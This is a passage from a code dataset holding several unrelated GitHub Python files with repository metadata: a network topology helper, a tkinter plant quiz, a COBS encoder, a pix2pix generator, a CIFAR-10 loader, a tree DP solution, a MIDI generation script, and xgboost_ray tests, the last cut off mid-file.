alias=f'{name}.dev2',\n owner=self, ns=ns2, **dev2_args)\n NetDev.set_peers(self.dev1, self.dev2)\n key = f'{self.REF}.{self.name}'\n self.topology.members[f'{key}.dev1'] = self.dev1\n self.topology.members[f'{key}.dev2'] = self.dev2\n self.topology.add_l2_conn(self.dev1, self.dev2)\n\n @classmethod\n def from_params(cls, topology, params):\n d1 = params['dev1']\n d2 = params['dev2']\n\n ns1 = topology.members[d1['netns']]\n ns2 = topology.members[d2['netns']]\n\n d1_args = NetDev.args_from_params(topology, d1)\n d2_args = NetDev.args_from_params(topology, d2)\n\n return cls(topology, params['name'], ns1, ns2,\n dev1_args=d1_args, dev2_args=d2_args)\n\n def render_bash(self):\n self.p(f'ip link add '\n f'{self.dev1.name} netns {self.dev1.ns.name} '\n f'type veth peer name '\n f'{self.dev2.name} netns {self.dev2.ns.name}')\n self.dev1.render_bash()\n self.dev2.render_bash()\n\n def render_dot(self):\n self.p(f'{self.dev1.dotname} -- {self.dev2.dotname}')\n","repo_name":"ebirger/netpen","sub_path":"netpen/veth.py","file_name":"veth.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"48"} +{"seq_id":"74429130385","text":"import tkinter as tk\nimport PIL.ImageTk, PIL.Image\n\nfrom quizgame import basequizgen\nfrom .basequizgen import basequizgen\nfrom .question import question\n\nclass GuessingGame(tk.Frame):\n def __init__(self, parent, quizgen, *args, **kwargs):\n super().__init__(parent, width=400, height=400, *args, **kwargs)\n\n if not isinstance(quizgen, basequizgen):\n raise Exception(\"No proper Quiz Generator given\")\n self.quizgen = quizgen\n\n self.tkimage = None\n\n self.active_qst = None\n\n self.answer_frame = tk.Frame(self)\n\n # configure string vars and labels\n self.questiontext = tk.StringVar()\n\n self.family_input = tk.StringVar()\n self.plantname_input = tk.StringVar()\n\n self.var_correct = tk.StringVar()\n self.var_wrong = tk.StringVar()\n\n self.correct_answer = tk.StringVar()\n\n self.var_correct.set(\"Correct: 0\")\n self.var_wrong.set(\"Missed: 0\")\n\n self.correct_answer.set(\"\")\n\n self.photolabel = tk.Label(self, relief=\"raised\")\n self.questionlabel = tk.Label(self, textvariable=self.questiontext, relief=\"raised\")\n\n self.family_entry = tk.Entry(self.answer_frame, textvariable=self.family_input)\n self.plantname_entry = tk.Entry(self.answer_frame, textvariable=self.plantname_input)\n\n self.family_label = tk.Label(self.answer_frame, text=\"Familie\")\n self.plantname_label = tk.Label(self.answer_frame, text=\"Pflanzenname\")\n\n self.correct_answer_label = tk.Label(self.answer_frame, textvariable=self.correct_answer)\n\n self.check_button = tk.Button(self.answer_frame, text=\"Check answer\", command=self.check_answer)\n self.next_button = tk.Button(self.answer_frame, text=\"Next Question\", command=self.show_question)\n\n # show number of wrong / correct attempts\n self.num_correct = 0\n self.num_missed = 0\n\n self.rateframe = tk.Frame(self)\n\n self.correct_label = tk.Label(self.rateframe, textvariable=self.var_correct)\n self.wrong_label = tk.Label(self.rateframe, textvariable=self.var_wrong)\n\n self.default_button_color = self.cget(\"bg\")\n\n self.set_grid()\n self.show_question()\n\n def set_grid(self):\n self.photolabel.grid(row=0, padx=10, pady=10)\n self.questionlabel.grid(row=1, pady=(0, 20))\n\n # inside self.answerframe\n self.family_label.grid(row=0, column=0)\n self.family_entry.grid(row=0, column=1)\n\n self.plantname_label.grid(row=1, column=0)\n self.plantname_entry.grid(row=1, column=1)\n\n self.correct_answer_label.grid(row=2, column=0, columnspan=2)\n\n self.check_button.grid(row=3, column=0)\n self.next_button.grid(row=3, column=1)\n\n # inside self.rateframe\n self.correct_label.grid(row=0, column=0)\n self.wrong_label.grid(row=0, column=1)\n\n # grid subframes\n self.rateframe.grid(row=8)\n\n self.answer_frame.grid(row=2)\n\n self.grid(row=0, column=0)\n\n def show_question(self):\n self.active_qst = self.quizgen.get_question()\n\n print(self.active_qst.correct_answer)\n\n if self.active_qst is None:\n self.questiontext = \"No more questions available\"\n return None\n\n self.check_button.config(state=tk.ACTIVE)\n self.next_button.config(state=tk.DISABLED)\n\n self.family_entry.config(bg=self.default_button_color)\n self.plantname_entry.config(bg=self.default_button_color)\n\n self.family_input.set(\"\")\n self.plantname_input.set(\"\")\n\n self.correct_answer.set(\"\")\n\n # show image\n maxsize = (600, 400)\n\n self.active_qst.image.thumbnail(maxsize, PIL.Image.ANTIALIAS)\n img = PIL.ImageTk.PhotoImage(self.active_qst.image)\n\n self.photolabel.config(image=img)\n self.tkimage = img\n\n self.photolabel.place(x=0, y=0, width=maxsize[0], height=maxsize[1])\n self.photolabel.grid(row=0)\n\n self.questiontext.set(self.active_qst.question)\n\n def check_answer(self):\n self.check_button.config(state=tk.DISABLED)\n self.next_button.config(state=tk.ACTIVE)\n\n correct_answer_parts = self.active_qst.correct_answer.lower().split('-')\n\n for i, s in enumerate(correct_answer_parts):\n correct_answer_parts[i] = s.strip()\n\n correct_family = correct_answer_parts[0]\n correct_name = correct_answer_parts[1]\n\n self.correct_answer.set(correct_family + \" - \" + correct_name)\n\n given_family = self.family_input.get().lower().strip()\n given_name = self.plantname_input.get().lower().strip()\n\n if given_family == correct_family:\n self.num_correct += 1\n self.family_entry.config(bg=\"green\")\n else:\n self.num_missed += 1\n self.family_entry.config(bg=\"red\")\n\n if given_name == correct_name:\n self.num_correct += 1\n self.plantname_entry.config(bg=\"green\")\n else:\n self.num_missed += 1\n self.plantname_entry.config(bg=\"red\")\n\n self.update_counter()\n\n def update_counter(self):\n self.var_correct.set(\"Correct: \" + str(self.num_correct))\n self.var_wrong.set(\"Wrong: \" + str(self.num_missed))\n\n\n\n\n\n\n\n\n","repo_name":"BeckmaR/QuizGame","sub_path":"quizgame/guessinggame.py","file_name":"guessinggame.py","file_ext":"py","file_size_in_byte":5280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43602816491","text":"from cobs import cobs\n\n\ndef bytes_to_int(inp):\n return int.from_bytes(inp, byteorder=\"little\", signed=False)\n\n\nclass CobsHandler:\n zero_byte = bytes([0])\n\n def __init__(self, *args):\n self.elements = [x for x in args]\n\n def get_components(self, inp):\n\n num_zeros = inp.count(CobsHandler.zero_byte)\n if num_zeros != (len(self.elements) + 1):\n raise ValueError(f\"why god {inp} {self.elements}\")\n\n splitted = inp.split(CobsHandler.zero_byte)\n\n if len(splitted) != (2 + len(self.elements)):\n raise ValueError(\"Wrong number of elements\")\n\n if len(splitted[0]) != 0:\n raise ValueError(\"Head is wrong\")\n\n if len(splitted[-1]) != 0:\n raise ValueError(\"Tail is wrong\")\n\n component_dict = dict()\n for entry_name, entry in zip(self.elements, splitted[1:-1]):\n component_dict[entry_name] = cobs.decode(entry)\n return component_dict\n\n @staticmethod\n def _encode_element(element, force=False):\n\n if isinstance(element, bytes) or isinstance(element, bytearray):\n return element\n elif isinstance(element, str):\n return element.encode()\n elif isinstance(element, int):\n bits = element.bit_length()\n num_bytes = bits // 8 + 1 if bits % 8 != 0 else 0\n return element.to_bytes(num_bytes, byteorder=\"little\", signed=False)\n if force:\n return bytes(element)\n return None\n\n @staticmethod\n def encode(inp):\n m = CobsHandler._encode_element(inp)\n if m is None:\n m = CobsHandler.zero_byte.join(\n map(lambda x: cobs.encode(CobsHandler._encode_element(x, True)), inp)\n )\n return CobsHandler.zero_byte + m + CobsHandler.zero_byte\n","repo_name":"diogoabnunes/SDLE-Projects","sub_path":"proj1/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23992275191","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport config\n\n\nclass Block(nn.Module):\n def __init__(self, in_channels, out_channels, down=True, act=\"relu\", use_dropout=False):\n super(Block, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 4, 2, 1, bias=False, padding_mode=\"reflect\")\n if down\n else nn.ConvTranspose2d(in_channels, out_channels, 4, 2, 1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU() if act == \"relu\" else nn.LeakyReLU(0.2),\n )\n\n self.use_dropout = use_dropout\n self.dropout = nn.Dropout(0.5)\n self.down = down\n\n def forward(self, x):\n x = self.conv(x)\n return self.dropout(x) if self.use_dropout else x\n\n\nclass Generator(nn.Module):\n def __init__(self, in_channels=3, features=64):\n super().__init__()\n self.initial_down = nn.Sequential(\n nn.Conv2d(in_channels, features, 4, 2, 1, padding_mode=\"reflect\"),\n nn.LeakyReLU(0.2),\n )\n self.down1 = Block(features, features * 2, down=True, act=\"leaky\", use_dropout=False)\n self.down2 = Block(\n features * 2, features * 4, down=True, act=\"leaky\", use_dropout=False\n )\n self.down3 = Block(\n features * 4, features * 8, down=True, act=\"leaky\", use_dropout=False\n )\n self.down4 = Block(\n features * 8, features * 8, down=True, act=\"leaky\", use_dropout=False\n )\n self.down5 = Block(\n features * 8, features * 8, down=True, act=\"leaky\", use_dropout=False\n )\n self.down6 = Block(\n features * 8, features * 8, down=True, act=\"leaky\", use_dropout=False\n )\n self.bottleneck = nn.Sequential(\n nn.Conv2d(features * 8, features * 8, 4, 2, 1), nn.ReLU()\n )\n\n self.up1 = Block(features * 8, features * 8, down=False, act=\"relu\", use_dropout=True)\n self.up2 = Block(\n features * 8 * 2, features * 8, down=False, act=\"relu\", use_dropout=True\n )\n self.up3 = Block(\n features * 8 * 2, features * 8, down=False, act=\"relu\", use_dropout=True\n )\n self.up4 = Block(\n features * 8 * 2, features * 8, down=False, act=\"relu\", use_dropout=False\n )\n self.up5 = Block(\n features * 8 * 2, features * 4, down=False, act=\"relu\", use_dropout=False\n )\n self.up6 = Block(\n features * 4 * 2, features * 2, down=False, act=\"relu\", use_dropout=False\n )\n self.up7 = Block(features * 2 * 2, features, down=False, act=\"relu\", use_dropout=False)\n self.final_up = nn.Sequential(\n nn.ConvTranspose2d(features * 2, in_channels, kernel_size=4, stride=2, padding=1),\n nn.Tanh(),\n )\n\n def forward(self, x):\n d1 = self.initial_down(x)\n d2 = self.down1(d1)\n d3 = self.down2(d2)\n d4 = self.down3(d3)\n d5 = self.down4(d4)\n d6 = self.down5(d5)\n d7 = self.down6(d6)\n bottleneck = self.bottleneck(d7)\n up1 = self.up1(bottleneck)\n up2 = self.up2(torch.cat([up1, d7], 1))\n up3 = self.up3(torch.cat([up2, d6], 1))\n up4 = self.up4(torch.cat([up3, d5], 1))\n up5 = self.up5(torch.cat([up4, d4], 1))\n up6 = self.up6(torch.cat([up5, d3], 1))\n up7 = self.up7(torch.cat([up6, d2], 1))\n return self.final_up(torch.cat([up7, d1], 1))\n\ndef load_model(path):\n model = Generator(in_channels=3, features=64)\n opt_gen = optim.Adam(model.parameters(), lr=config.LEARNING_RATE, betas=(0.5, 0.999))\n checkpoint = torch.load(path, map_location=torch.device('cpu'))\n model.load_state_dict(checkpoint[\"state_dict\"])\n opt_gen.load_state_dict(checkpoint[\"optimizer\"])\n for param_grp in opt_gen.param_groups:\n param_grp[\"lr\"] = config.LEARNING_RATE\n print(config.DEVICE)\n return model\n","repo_name":"Afsanay/pix2pixStreamlit","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25088584835","text":"\"\"\"\nCreated by Philippenko, 17th February 2022.\n\"\"\"\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\n\nfrom PathDataset import get_path_to_datasets\nfrom Timer import Timer\n\n\nclass Dataset:\n\n def __init__(self, batch_size, dataset_name = \"cifar10\") -> None:\n super().__init__()\n self.batch_size = batch_size\n self.dataset_name = dataset_name\n self.dataset_class = self.__get_dataset_class__()\n\n def get_loaders(self):\n timer = Timer()\n timer.start()\n\n ### We set pin_memory to True if we push the dataset from the CPU to the GPU, this speed-up the transfer.\n pin_memory = True if torch.cuda.is_available() else False\n\n ### Get train/test transformers to preprocess data\n transform_train, transform_test = self.__data_transfomer__()\n\n num_workers = 1 # Suggested max number of worker in my GPU's system is 1\n\n ### Get train loader\n train_set = self.dataset_class(root=get_path_to_datasets() + '/dataset', train=True,\n download=True, transform=transform_train)\n train_loader = torch.utils.data.DataLoader(train_set, batch_size=self.batch_size, pin_memory=pin_memory,\n shuffle=True, num_workers=num_workers)\n full_train_loader = torch.utils.data.DataLoader(train_set, batch_size=6000, pin_memory=pin_memory,\n shuffle=True, num_workers=num_workers)\n\n ### Get test loader\n test_set = self.dataset_class(root=get_path_to_datasets() + './dataset', train=False,\n download=True, transform=transform_test)\n test_loader = torch.utils.data.DataLoader(test_set, batch_size=self.batch_size, pin_memory=pin_memory,\n shuffle=False, num_workers=num_workers)\n timer.stop()\n return train_loader, full_train_loader, test_loader, timer.time\n\n def __get_dataset_class__(self):\n \"\"\"Get the class of the given dataset to later load it.\"\"\"\n if self.dataset_name == \"cifar10\":\n return torchvision.datasets.CIFAR10\n else:\n raise ValueError(\"The given dataset is not recognized.\")\n\n def __data_transfomer__(self):\n\n if self.dataset_name == \"cifar10\":\n ### Image shape: torch.Size([128, 3, 32, 32])\n\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n transform_train = transforms.Compose([\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(32, 4),\n transforms.ToTensor(),\n normalize,\n ])\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n normalize,\n ])\n else:\n raise ValueError(\"The given dataset is not recognized.\")\n\n return transform_train, transform_test","repo_name":"philipco/benchmark-pytorch","sub_path":"Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1755433373","text":"import sys\nread = sys.stdin.readline\nsys.setrecursionlimit(10**6)\n\nn = int(read())\ntree = [[] for _ in range(n + 1)]\nvisit = [False for _ in range(n + 1)]\nans = 0\ndp = [[0, 1] for _ in range(n + 1)]\n\n\ndef rec(root):\n visit[root] = True\n for nxt in tree[root]:\n if visit[nxt]:\n continue\n rec(nxt)\n dp[root][0] += dp[nxt][1]\n dp[root][1] += min(dp[nxt][0], dp[nxt][1])\n\n\nfor _ in range(n - 1):\n u, v = map(int, read().split())\n tree[v].append(u)\n tree[u].append(v)\nrec(1)\nprint(min(dp[1]))\n","repo_name":"devkeon/Algorithm","sub_path":"Baekjoon/boj2xxx/boj2533.py","file_name":"boj2533.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"345144302","text":"import os\nimport sys\nimport yaml\nimport pickle\nimport shutil\nimport argparse\nfrom torch.utils.data import DataLoader\nsys.path.append('..')\n\nfrom midigen.models.gpt2.gpt2 import GPT\nfrom midigen.data.dataset import EPianoDataset\nfrom midigen.data.neural_processor import encode_midi, decode_midi\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--model_type', default='GPT', help=\"Type of model: GPT or Transformer\")\n parser.add_argument('--model_path', help=\"Path to model weights\")\n parser.add_argument('--output_dir', help=\"Path to output results\")\n parser.add_argument('--dataset_pickle', help=\"Path to model weights\")\n parser.add_argument('--number_of_seqs', default=10, type=int, help='Number of primer sequences to generate from')\n parser.add_argument('--max_seq', default=512, type=int, help='Length of primer sequence')\n parser.add_argument('--target_len', default=2048, type=int, help=\"Length of model output\")\n parser.add_argument('--beam', default=0, type=int, help=\"Number of hypothesis in beam search\")\n parser.add_argument('--device', default='cpu', help=\"Path to model weights\")\n args = parser.parse_args()\n\n\n if args.model_type == 'GPT':\n model = GPT.load(args.model_path, device=args.device).to(args.device).eval()\n else:\n raise NotImplementedError(f'Model {args.model_type} not implemented yet.')\n with open(args.dataset_pickle, 'rb') as f:\n data = pickle.load(f)\n\n test_dataset = EPianoDataset(data['test'], max_seq=args.max_seq, random_seq=False,\n num_files=5, type='test')\n\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n\n print(f'Saving midi files to {args.output_dir} with beam of {args.beam}')\n for idx in range(args.number_of_seqs):\n primer, _ = test_dataset[idx]\n primer = primer.to(args.device)\n decode_midi(primer[:args.max_seq].cpu().numpy(), file_path=os.path.join(args.output_dir, f\"primer_{idx}.mid\"))\n rand_seq = model.generate(primer[:args.max_seq], args.target_len, beam=args.beam)\n decode_midi(rand_seq[0].cpu().numpy(), file_path=os.path.join(args.output_dir, f\"generated_beam{args.beam}_{idx}.mid\"))\n","repo_name":"Sashmark97/midigen","sub_path":"scripts/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"29491458391","text":"import os\nimport shutil\nimport tempfile\nimport unittest\n\nimport numpy as np\nimport ray\nimport xgboost as xgb\nfrom ray.exceptions import RayActorError, RayTaskError\nfrom ray.util.scheduling_strategies import PlacementGroupSchedulingStrategy\nfrom scipy.sparse import csr_matrix\n\nfrom xgboost_ray import RayDMatrix, RayParams, RayShardingMode, predict, train\nfrom xgboost_ray.callback import DistributedCallback\nfrom xgboost_ray.main import RayXGBoostTrainingError\nfrom xgboost_ray.tests.utils import get_num_trees\n\n\ndef _make_callback(tmpdir: str) -> DistributedCallback:\n class TestDistributedCallback(DistributedCallback):\n logdir = tmpdir\n\n def on_init(self, actor, *args, **kwargs):\n log_file = os.path.join(self.logdir, f\"rank_{actor.rank}.log\")\n actor.log_fp = open(log_file, \"at\")\n actor.log_fp.write(f\"Actor {actor.rank}: Init\\n\")\n actor.log_fp.flush()\n\n def before_data_loading(self, actor, data, *args, **kwargs):\n actor.log_fp.write(f\"Actor {actor.rank}: Before loading\\n\")\n actor.log_fp.flush()\n\n def after_data_loading(self, actor, data, *args, **kwargs):\n actor.log_fp.write(f\"Actor {actor.rank}: After loading\\n\")\n actor.log_fp.flush()\n\n def before_train(self, actor, *args, **kwargs):\n actor.log_fp.write(f\"Actor {actor.rank}: Before train\\n\")\n actor.log_fp.flush()\n\n def after_train(self, actor, result_dict, *args, **kwargs):\n actor.log_fp.write(f\"Actor {actor.rank}: After train\\n\")\n actor.log_fp.flush()\n\n def before_predict(self, actor, *args, **kwargs):\n actor.log_fp.write(f\"Actor {actor.rank}: Before predict\\n\")\n actor.log_fp.flush()\n\n def after_predict(self, actor, predictions, *args, **kwargs):\n actor.log_fp.write(f\"Actor {actor.rank}: After predict\\n\")\n actor.log_fp.flush()\n\n return TestDistributedCallback()\n\n\nclass XGBoostRayEndToEndTest(unittest.TestCase):\n \"\"\"In this test suite we validate Ray-XGBoost multi class prediction.\n\n First, we validate that XGBoost is able to achieve 100% accuracy on\n a simple training task.\n\n Then we split the dataset into two halves. These halves don't have access\n to all relevant data, so overfit on their respective data. I.e. the first\n half always predicts feature 2 -> label 2, while the second half always\n predicts feature 2 -> label 3.\n\n We then train using Ray XGBoost. Again both halves will be trained\n separately, but because of Rabit's allreduce, they should end up being\n able to achieve 100% accuracy, again.\"\"\"\n\n def setUp(self):\n repeat = 8 # Repeat data a couple of times for stability\n self.x = np.array(\n [\n [1, 0, 0, 0], # Feature 0 -> Label 0\n [0, 1, 0, 0], # Feature 1 -> Label 1\n [0, 0, 1, 1], # Feature 2+3 -> Label 2\n [0, 0, 1, 0], # Feature 2+!3 -> Label 3\n ]\n * repeat\n )\n self.y = np.array([0, 1, 2, 3] * repeat)\n\n self.params = {\n \"booster\": \"gbtree\",\n \"nthread\": 1,\n \"max_depth\": 2,\n \"objective\": \"multi:softmax\",\n \"num_class\": 4,\n }\n\n def tearDown(self):\n if ray.is_initialized:\n ray.shutdown()\n\n def testSingleTraining(self):\n \"\"\"Test that XGBoost learns to predict full matrix\"\"\"\n dtrain = xgb.DMatrix(self.x, self.y)\n bst = xgb.train(self.params, dtrain, num_boost_round=2)\n\n x_mat = xgb.DMatrix(self.x)\n pred_y = bst.predict(x_mat)\n self.assertSequenceEqual(list(self.y), list(pred_y))\n\n def testHalfTraining(self):\n \"\"\"Test that XGBoost learns to predict half matrices individually\"\"\"\n x_first = self.x[::2]\n y_first = self.y[::2]\n\n x_second = self.x[1::2]\n y_second = self.y[1::2]\n\n # Test case: The first model only sees feature 2 --> label 2\n # and the second model only sees feature 2 --> label 3\n test_X = xgb.DMatrix(np.array([[0, 0, 1, 1], [0, 0, 1, 0]]))\n test_y_first = [2, 2]\n test_y_second = [3, 3]\n\n # First half\n dtrain = xgb.DMatrix(x_first, y_first)\n bst = xgb.train(self.params, dtrain, num_boost_round=2)\n\n x_mat = xgb.DMatrix(x_first)\n pred_y = bst.predict(x_mat)\n self.assertSequenceEqual(list(y_first), list(pred_y))\n\n pred_test = bst.predict(test_X)\n self.assertSequenceEqual(test_y_first, list(pred_test))\n\n # Second half\n dtrain = xgb.DMatrix(x_second, y_second)\n bst = xgb.train(self.params, dtrain, num_boost_round=2)\n\n x_mat = xgb.DMatrix(x_second)\n pred_y = bst.predict(x_mat)\n self.assertSequenceEqual(list(y_second), list(pred_y))\n\n pred_test = bst.predict(test_X)\n self.assertSequenceEqual(test_y_second, list(pred_test))\n\n def test_client_actor_cpus(self):\n ray.init(num_cpus=5, num_gpus=0)\n\n @ray.remote\n class DummyTrainActor:\n def test(self):\n import xgboost_ray\n\n return xgboost_ray.main._ray_get_actor_cpus()\n\n actor = DummyTrainActor.options(num_cpus=2).remote()\n assert ray.get(actor.test.remote()) == 2\n\n pg = ray.util.placement_group([{\"CPU\": 2}])\n ray.get(pg.ready())\n actor2 = DummyTrainActor.options(\n num_cpus=2,\n scheduling_strategy=PlacementGroupSchedulingStrategy(placement_group=pg),\n ).remote()\n assert ray.get(actor2.test.remote()) == 2\n\n def _testJointTraining(self, sharding=RayShardingMode.INTERLEAVED, softprob=False):\n \"\"\"Train with Ray. The data will be split, but the trees\n should be combined together and find the true model.\"\"\"\n params = self.params.copy()\n if softprob:\n params[\"objective\"] = \"multi:softprob\"\n\n bst = train(\n params,\n RayDMatrix(self.x, self.y, sharding=sharding),\n ray_params=RayParams(num_actors=2),\n )\n\n x_mat = xgb.DMatrix(self.x)\n pred_y = bst.predict(x_mat)\n if softprob:\n pred_y = np.argmax(pred_y, axis=1)\n pred_y = pred_y.astype(int)\n self.assertSequenceEqual(list(self.y), list(pred_y))\n\n x_mat = RayDMatrix(self.x, sharding=sharding)\n pred_y = predict(bst, x_mat, ray_params=RayParams(num_actors=2))\n if softprob:\n pred_y = np.argmax(pred_y, axis=1)\n pred_y = pred_y.astype(int)\n self.assertSequenceEqual(list(self.y), list(pred_y))\n\n # try on an odd number of rows\n bst = train(\n params,\n RayDMatrix(self.x[:-1], self.y[:-1], sharding=sharding),\n ray_params=RayParams(num_actors=2),\n )\n\n x_mat = RayDMatrix(self.x[:-1], sharding=sharding)\n pred_y = predict(bst, x_mat, ray_params=RayParams(num_actors=2))\n if softprob:\n pred_y = np.argmax(pred_y, axis=1)\n pred_y = pred_y.astype(int)\n self.assertSequenceEqual(list(self.y[:-1]), list(pred_y))\n\n def testJointTrainingInterleaved(self):\n ray.init(num_cpus=2, num_gpus=0)\n self._testJointTraining(sharding=RayShardingMode.INTERLEAVED)\n self._testJointTraining(sharding=RayShardingMode.INTERLEAVED, softprob=True)\n\n def testJointTrainingBatch(self):\n ray.init(num_cpus=2, num_gpus=0)\n self._testJointTraining(sharding=RayShardingMode.BATCH)\n self._testJointTraining(sharding=RayShardingMode.BATCH, softprob=True)\n\n def testTrainPredict(\n self, init=True, remote=None, softprob=False, **ray_param_dict\n ):\n \"\"\"Train with evaluation and predict\"\"\"\n if init:\n ray.init(num_cpus=2, num_gpus=0)\n\n dtrain = RayDMatrix(self.x, self.y)\n\n params = self.params\n if softprob:\n params = params.copy()\n params[\"objective\"] = \"multi:softprob\"\n\n evals_result = {}\n bst = train(\n params,\n dtrain,\n num_boost_round=38,\n ray_params=RayParams(num_actors=2, **ray_param_dict),\n evals=[(dtrain, \"dtrain\")],\n evals_result=evals_result,\n _remote=remote,\n )\n\n self.assertEqual(get_num_trees(bst), 38)\n\n self.assertTrue(\"dtrain\" in evals_result)\n\n x_mat = RayDMatrix(self.x)\n pred_y = predict(\n bst,\n x_mat,\n ray_params=RayParams(num_actors=2, **ray_param_dict),\n _remote=remote,\n )\n\n if softprob:\n self.assertEqual(pred_y.shape[1], len(np.unique(self.y)))\n pred_y = np.argmax(pred_y, axis=1)\n\n self.assertSequenceEqual(list(self.y), list(pred_y))\n\n def testTrainPredictSoftprob(self):\n \"\"\"Train with evaluation and predict on softprob objective\n (which returns predictions in a 2d array)\n \"\"\"\n self.testTrainPredict(init=True, softprob=True)\n\n def testTrainPredictRemote(self):\n \"\"\"Train with evaluation and predict in a remote call\"\"\"\n self.testTrainPredict(init=True, remote=True)\n\n def testTrainPredictClient(self):\n \"\"\"Train with evaluation and predict in a client session\"\"\"\n if ray.__version__ <= \"1.2.0\":\n self.skipTest(\"Ray client mocks do not work in Ray <= 1.2.0\")\n from ray.util.client.ray_client_helpers import ray_start_client_server\n\n ray.init(num_cpus=2, num_gpus=0)\n self.assertFalse(ray.util.client.ray.is_connected())\n with ray_start_client_server():\n self.assertTrue(ray.util.client.ray.is_connected())\n\n self.testTrainPredict(init=False, remote=None)\n\n def testDistributedCallbacksTrainPredict(self, init=True, remote=False):\n \"\"\"Test distributed callbacks for train/predict\"\"\"\n tmpdir = tempfile.mkdtemp()\n test_callback = _make_callback(tmpdir)\n\n self.testTrainPredict(\n init=init, remote=remote, distributed_callbacks=[test_callback]\n )\n rank_0_log_file = os.path.join(tmpdir, \"rank_0.log\")\n rank_1_log_file = os.path.join(tmpdir, \"rank_1.log\")\n self.assertTrue(os.path.exists(rank_1_log_file))\n\n rank_0_log = open(rank_0_log_file, \"rt\").read()\n self.assertEqual(\n rank_0_log,\n \"Actor 0: Init\\n\"\n \"Actor 0: Before loading\\n\"\n \"Actor 0: After loading\\n\"\n \"Actor 0: Before train\\n\"\n \"Actor 0: After train\\n\"\n \"Actor 0: Init\\n\"\n \"Actor 0: Before loading\\n\"\n \"Actor 0: After loading\\n\"\n \"Actor 0: Before predict\\n\"\n \"Actor 0: After predict\\n\",\n )\n shutil.rmtree(tmpdir)\n\n def testDistributedCallbacksTrainPredictClient(self):\n \"\"\"Test distributed callbacks for train/predict via Ray client\"\"\"\n\n if ray.__version__ <= \"1.2.0\":\n self.skipTest(\"Ray client mocks do not work in Ray <= 1.2.0\")\n from ray.util.client.ray_client_helpers import ray_start_client_server\n\n ray.init(num_cpus=2, num_gpus=0)\n self.assertFalse(ray.util.client.ray.is_connected())\n with ray_start_client_server():\n self.assertTrue(ray.util.client.ray.is_connected())\n\n self.testDistributedCallbacksTrainPredict(init=False, remote=None)\n\n def testFailPrintErrors(self):\n \"\"\"Test that XGBoost training errors are propagated\"\"\"\n x = np.random.uniform(0, 1, size=(100, 4))\n y = np.random.randint(0, 2, size=100)\n\n train_set = RayDMatrix(x, y)\n\n try:\n train(\n {\n \"objective\": \"multi:softmax\",\n \"num_class\": 2,\n \"eval_metric\": [\"logloss\", \"error\"],\n }, # This will error\n train_set,\n evals=[(train_set, \"train\")],\n ray_params=RayParams(num_actors=1, max_actor_restarts=0),\n )\n except RuntimeError as exc:\n self.assertTrue(exc.__cause__)\n self.assertTrue(isinstance(exc.__cause__, RayActorError))\n\n self.assertTrue(exc.__cause__.__cause__)\n self.assertTrue(isinstance(exc.__cause__.__cause__, RayTaskError))\n\n self.assertTrue(exc.__cause__.__cause__.cause)\n self.assertTrue(\n isinstance(exc.__cause__.__cause__.cause, RayXGBoostTrainingError)\n )\n\n self.assertIn(\n \"label and prediction size not match\", str(exc.__cause__.__cause__)\n )\n\n def testKwargsValidation(self):\n x = np.random.uniform(0, 1, size=(100, 4))\n y = np.random.randint(0, 1, size=100)\n\n train_set = RayDMatrix(x, y)\n\n with self.assertRaisesRegex(TypeError, \"totally_invalid_kwarg\"):\n train(\n {\n \"objective\": \"multi:softmax\",\n \"num_class\": 2,\n \"eval_metric\": [\"logloss\", \"error\"],\n },\n train_set,\n evals=[(train_set, \"train\")],\n ray_params=RayParams(num_actors=1, max_actor_restarts=0),\n totally_invalid_kwarg=\"\",\n )\n\n def testRanking(self):\n Xrow = np.array([1, 2, 6, 8, 11, 14, 16, 17])\n Xcol = np.array([0, 0, 1, 1, 2, 2, 3, 3])\n X = csr_matrix((np.ones(shape=8), (Xrow, Xcol)), shape=(20, 4)).toarray()\n y = np.array(\n [\n 0.0,\n 1.0,\n 1.0,\n 0.0,\n 0.0,\n 0.0,\n 1.0,\n 0.0,\n 1.0,\n 0.0,\n 0.0,\n 1.0,\n 0.0,\n 0.0,\n 1.0,\n 0.0,\n 1.0,\n 1.0,\n 0.0,\n 0.0,\n ]\n )\n\n qid = np.array([0] * 5 + [1] * 5 + [2] * 5 + [3] * 5)\n dtrain = RayDMatrix(X, label=y, qid=qid)\n\n params = {\n \"eta\": 1,\n \"objective\": \"rank:pairwise\",\n \"eval_metric\": [\"auc\", \"aucpr\"],\n \"max_depth\": 1,\n }\n evals_result = {}\n train(\n params,\n dtrain,\n 10,\n evals=[(dtrain, \"train\")],\n evals_result=evals_result,\n ray_params=RayParams(num_actors=2, max_actor_restarts=0),\n )\n auc_rec = evals_result[\"train\"][\"auc\"]\n self.assertTrue(all(p <= q for p, q in zip(auc_rec, auc_rec[1:])))\n auc_rec = evals_result[\"train\"][\"aucpr\"]\n self.assertTrue((p <= q for p, q in zip(auc_rec, auc_rec[1:])))\n\n @unittest.skipIf(\n xgb.__version__ < \"1.3.0\", f\"not supported in xgb version 